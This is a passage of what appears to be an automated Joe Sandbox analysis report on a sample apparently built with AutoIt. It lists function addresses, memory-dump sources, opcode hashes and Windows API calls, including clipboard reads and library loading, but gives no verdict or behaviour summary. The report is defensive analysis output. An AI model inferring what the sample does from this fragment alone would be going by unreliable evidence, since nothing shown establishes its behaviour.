                                                                                          Function 00412C38 Relevance: .4, Instructions: 384COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                          • Instruction ID: b3f199f19983f506b623bfe7955a95149e6efe4e98ce3416cc40fa12ddcf4508
                                                                                          • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                          • Instruction Fuzzy Hash: 46D19073C0A9B30A8735812D42582BFEE626FD578131EC3E29CD07F38AD26B5DA195D4
                                                                                          Function 00412818 Relevance: .4, Instructions: 378COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                          • Instruction ID: c47bdb3f9c9e38c5d46ddb9e43dedaf70276048770aeb58bd274f21c588a824b
                                                                                          • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                          • Instruction Fuzzy Hash: 1CD19073D1A9B30A8735852D42581AFEE626FD578031EC3E2CCD07F38AD16B5DA191D4
                                                                                          Function 0041240C Relevance: .4, Instructions: 361COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                          • Instruction ID: ac15b8da1a4b082d71a0b082c8349c97121379a14580263daf363e6ab8f75410
                                                                                          • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                          • Instruction Fuzzy Hash: 87C18173C0A9B30A8736812D42641AFEE626FD579031FC3E2CCD47F38A91AB5DA195D4
                                                                                          Function 00412038 Relevance: .4, Instructions: 351COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                          • Instruction ID: aa957cafbedeae1199dea6a597ba911d219650f283d164fb65797e90308ef47b
                                                                                          • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                          • Instruction Fuzzy Hash: 5FC18E73D0A9B30A8735812D42581AFEE626FD578031EC3E28CE46F38ED26F5DA195D4
                                                                                          Function 040E70B0 Relevance: .1, Instructions: 92COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1425973237.00000000040E3000.00000040.00000020.00020000.00000000.sdmp, Offset: 040E3000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_40e3000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                          • Instruction ID: ae6852f3b786a26cc90bcbc21f4f1cbb670b9d74aad5e9156a2f3b255a416631
                                                                                          • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                          • Instruction Fuzzy Hash: BB41A271D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB90
                                                                                          Function 040E6FA0 Relevance: .0, Instructions: 35COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1425973237.00000000040E3000.00000040.00000020.00020000.00000000.sdmp, Offset: 040E3000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_40e3000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                          • Instruction ID: 3cb9b3b303fa4c5830534f142083fcb9d504ffea91f07eadfc458dad488121f3
                                                                                          • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                          • Instruction Fuzzy Hash: CE019278A00109EFCB84DF99D5909AEF7F5FF48310F608599E819A7341E731AE51DB80
                                                                                          Function 040E6F40 Relevance: .0, Instructions: 35COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1425973237.00000000040E3000.00000040.00000020.00020000.00000000.sdmp, Offset: 040E3000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_40e3000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                          • Instruction ID: 2ac4f54d0c6f86d25d7f70de9ceae714c2440e814a96b2452028877cbb49121a
                                                                                          • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                          • Instruction Fuzzy Hash: 2501D278A00109EFCB88DF99D5809AEF7F5FF48310F608999E809A7340E731AE51DB80
                                                                                          Function 00410D10 Relevance: .0, Instructions: 19COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
                                                                                          • Instruction ID: b8cfd58d412160527e66ace840abba843d94ac3f5b06779728c9fe736b8606cc
                                                                                          • Opcode Fuzzy Hash: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
                                                                                          • Instruction Fuzzy Hash: ECD012F621844146F33144D866C0BD100437344310FB58C276005CEBC1C0DDECD6C229
                                                                                          Function 040E5920 Relevance: .0, Instructions: 6COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1425973237.00000000040E3000.00000040.00000020.00020000.00000000.sdmp, Offset: 040E3000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_40e3000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                          • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                          • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                          • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                                          Function 00459384 Relevance: 79.2, APIs: 41, Strings: 4, Instructions: 480filewindowcomCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • DeleteObject.GDI32(?), ref: 004593D7
                                                                                          • DeleteObject.GDI32(?), ref: 004593F1
                                                                                          • DestroyWindow.USER32(?), ref: 00459407
                                                                                          • GetDesktopWindow.USER32 ref: 0045942A
                                                                                          • GetWindowRect.USER32(00000000), ref: 00459431
                                                                                          • SetRect.USER32(50000001,00000000,00000000,000001F4,?), ref: 00459568
                                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00459577
                                                                                          • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,?,?,50000001,?,?,00000000,00000000), ref: 004595BB
                                                                                          • GetClientRect.USER32(00000000,?), ref: 004595C8
                                                                                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 00459615
                                                                                          • CreateFileW.KERNEL32(00000000,?,80000000,00000000,00000000,00000003,00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459635
                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459654
                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 0045965F
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00459668
                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459678
                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0045967F
                                                                                          • CloseHandle.KERNEL32(00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459686
                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,50000001,?,?,00000000,00000000,00000000), ref: 00459694
                                                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,000001F4), ref: 004596AD
                                                                                          • GlobalFree.KERNEL32(00000000), ref: 004596C0
                                                                                          • CopyImage.USER32(000000FF,00000000,00000000,00000000,00002000), ref: 004596EF
                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,000000FF), ref: 00459712
                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,50000001,?,?,00000000,00000000,00000000), ref: 0045973D
                                                                                          • ShowWindow.USER32(?,00000004,?,50000001,?,?,00000000,00000000,00000000), ref: 0045974B
                                                                                          • CreateWindowExW.USER32(00000000,static,00000000,?,?,0000000B,0000000B,?,?,?,00000000,00000000), ref: 0045979C
                                                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004597AD
                                                                                          • GetStockObject.GDI32(00000011), ref: 004597B7
                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 004597BF
                                                                                          • GetTextFaceW.GDI32(00000000,00000040,00000190,?,50000001,?,?,00000000,00000000,00000000), ref: 004597CD
                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004597D6
                                                                                          • DeleteDC.GDI32(00000000), ref: 004597E1
                                                                                          • _wcslen.LIBCMT ref: 00459800
                                                                                          • _wcscpy.LIBCMT ref: 0045981F
                                                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 004598BB
                                                                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 004598D0
                                                                                          • GetDC.USER32(?), ref: 004598DE
                                                                                          • SelectObject.GDI32(00000000,?), ref: 004598EE
                                                                                          • SelectObject.GDI32(00000000,?), ref: 00459919
                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00459925
                                                                                          • MoveWindow.USER32(?,0000000B,?,?,?,00000001), ref: 00459943
                                                                                          • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 00459951
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                                          • String ID: $AutoIt v3$DISPLAY$static
                                                                                          • API String ID: 4040870279-2373415609
                                                                                          • Opcode ID: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
                                                                                          • Instruction ID: fce7466cc8f2b4b34a2e278d60cb4f704f90ff1017bfb666dbfc83d8aba9d67a
                                                                                          • Opcode Fuzzy Hash: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
                                                                                          • Instruction Fuzzy Hash: 3F028C70204301EFD714DF64DE89F2BB7A8AB84705F104A2DFA45AB2D2D7B4E805CB69
                                                                                          Function 00403E50 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 236COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: __wcsnicmp
                                                                                          • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                                          • API String ID: 1038674560-3360698832
                                                                                          • Opcode ID: c74d0d52908dbbec4f5022c33a9c4844136c2b84c95de0bb8b15b994b6f8f789
                                                                                          • Instruction ID: b6083b7aed1673b33e689ff2aa7e8f17f47d7310e90ec65f4167159f85ee96f3
                                                                                          • Opcode Fuzzy Hash: c74d0d52908dbbec4f5022c33a9c4844136c2b84c95de0bb8b15b994b6f8f789
                                                                                          • Instruction Fuzzy Hash: 5A611471B4071076EA306A229C46FAB735CDF14345F50052FFC01A628BE7ADDA4A86EE
                                                                                          Function 00433D5C Relevance: 42.2, APIs: 28, Instructions: 198windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetSysColor.USER32(0000000E), ref: 00433D81
                                                                                          • SetTextColor.GDI32(?,00000000), ref: 00433D89
                                                                                          • GetSysColor.USER32(00000012), ref: 00433DA3
                                                                                          • SetTextColor.GDI32(?,?), ref: 00433DAB
                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00433DBF
                                                                                          • GetSysColor.USER32(0000000F), ref: 00433DCB
                                                                                          • CreateSolidBrush.GDI32(?), ref: 00433DD4
                                                                                          • GetSysColor.USER32(00000011), ref: 00433DEB
                                                                                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
                                                                                          • SelectObject.GDI32(?,00000000), ref: 00433E0D
                                                                                          • SetBkColor.GDI32(?,?), ref: 00433E19
                                                                                          • SelectObject.GDI32(?,?), ref: 00433E29
                                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 00433E54
                                                                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00433E73
                                                                                          • GetWindowLongW.USER32 ref: 00433E8A
                                                                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC
                                                                                          • GetWindowTextW.USER32(00000000,00000000,00000105), ref: 00433EE1
                                                                                          • InflateRect.USER32(?,000000FD,000000FD), ref: 00433F13
                                                                                          • DrawFocusRect.USER32(?,?), ref: 00433F1F
                                                                                          • GetSysColor.USER32(00000011), ref: 00433F2E
                                                                                          • SetTextColor.GDI32(?,00000000), ref: 00433F36
                                                                                          • DrawTextW.USER32(?,?,000000FF,?,?), ref: 00433F4E
                                                                                          • SelectObject.GDI32(?,?), ref: 00433F63
                                                                                          • DeleteObject.GDI32(?), ref: 00433F70
                                                                                          • SelectObject.GDI32(?,?), ref: 00433F78
                                                                                          • DeleteObject.GDI32(00000000), ref: 00433F7B
                                                                                          • SetTextColor.GDI32(?,?), ref: 00433F83
                                                                                          • SetBkColor.GDI32(?,?), ref: 00433F8F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                          • String ID:
                                                                                          • API String ID: 1582027408-0
                                                                                          • Opcode ID: aa49e6287f5c8eaa4963889518cb643ef6cff4134c3562cc94785d6825a4d511
                                                                                          • Instruction ID: aa454ab644ffbff4d2185aee23397a25bdbdaef3ad5a75b83a3ebbbeed3afe32
                                                                                          • Opcode Fuzzy Hash: aa49e6287f5c8eaa4963889518cb643ef6cff4134c3562cc94785d6825a4d511
                                                                                          • Instruction Fuzzy Hash: 53710570508340AFD304DF68DD88A6FBBF9FF89711F104A2DFA5592290D7B4E9418B6A
                                                                                          Function 0046C604 Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 216clipboardCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • OpenClipboard.USER32(?), ref: 0046C635
                                                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046C643
                                                                                          • GetClipboardData.USER32(0000000D), ref: 0046C64F
                                                                                          • CloseClipboard.USER32 ref: 0046C65D
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 0046C688
                                                                                          • CloseClipboard.USER32 ref: 0046C692
                                                                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 0046C6D5
                                                                                          • GetClipboardData.USER32(00000001), ref: 0046C6DD
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 0046C6EE
                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0046C726
                                                                                          • CloseClipboard.USER32 ref: 0046C866
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Clipboard$CloseGlobal$AvailableDataFormatLock$OpenUnlock
                                                                                          • String ID: HH
                                                                                          • API String ID: 589737431-2761332787
                                                                                          • Opcode ID: 1f8588b948bb152d659cc961560e711d284fc80ef968a1445fa6f6d22cce4332
                                                                                          • Instruction ID: ccec0c76267f611a980a6192e38ed766f4c6ddce8b7f15b38bc446a2cb1d96e7
                                                                                          • Opcode Fuzzy Hash: 1f8588b948bb152d659cc961560e711d284fc80ef968a1445fa6f6d22cce4332
                                                                                          • Instruction Fuzzy Hash: 4D61E5722003019BD310EF65DD86B5E77A8EF54715F00483EFA41E72D1EBB5D9048BAA
                                                                                          Function 0045657D Relevance: 38.8, APIs: 19, Strings: 3, Instructions: 287windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCursorPos.USER32(?), ref: 00456692
                                                                                          • GetDesktopWindow.USER32 ref: 004566AA
                                                                                          • GetWindowRect.USER32(00000000), ref: 004566B1
                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0045670D
                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00456720
                                                                                          • DestroyWindow.USER32(?), ref: 00456731
                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456779
                                                                                          • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 00456797
                                                                                          • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567C0
                                                                                          • SendMessageW.USER32(?,00000421,?,?), ref: 004567D8
                                                                                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 004567EE
                                                                                          • IsWindowVisible.USER32(?), ref: 00456812
                                                                                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 0045682E
                                                                                          • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 00456843
                                                                                          • GetWindowRect.USER32(?,?), ref: 0045685C
                                                                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 00456880
                                                                                          • GetMonitorInfoW.USER32 ref: 00456894
                                                                                          • CopyRect.USER32(?,?), ref: 004568A8
                                                                                          • SendMessageW.USER32(?,00000412,00000000), ref: 0045690A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$MessageSend$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                                          • String ID: ($,$tooltips_class32
                                                                                          • API String ID: 541082891-3320066284
                                                                                          • Opcode ID: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
                                                                                          • Instruction ID: 3987ef5f26dee50c6234681dd74380f3ee0746d74ffcadc96223edc745891050
                                                                                          • Opcode Fuzzy Hash: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
                                                                                          • Instruction Fuzzy Hash: 33B18EB0604341AFD714DF64C984B6BB7E5EF88704F408D2DF989A7292D778E848CB5A
                                                                                          Function 00454DAA Relevance: 38.7, APIs: 18, Strings: 4, Instructions: 203windowlibraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _wcslen.LIBCMT ref: 00454DCF
                                                                                          • _wcslen.LIBCMT ref: 00454DE2
                                                                                          • __wcsicoll.LIBCMT ref: 00454DEF
                                                                                          • _wcslen.LIBCMT ref: 00454E04
                                                                                          • __wcsicoll.LIBCMT ref: 00454E11
                                                                                          • _wcslen.LIBCMT ref: 00454E24
                                                                                          • __wcsicoll.LIBCMT ref: 00454E31
                                                                                            • Part of subcall function 004115D0: __wcsicmp_l.LIBCMT ref: 00411657
                                                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00454E65
                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,?,?,?,?,?,?,?,00000000), ref: 00454E79
                                                                                          • LoadImageW.USER32(00000000,00000000,?,00000001,?,?), ref: 00454EB7
                                                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00454EFB
                                                                                          • LoadImageW.USER32(00000000,00000000,?,00000001,?,?), ref: 00454F2C
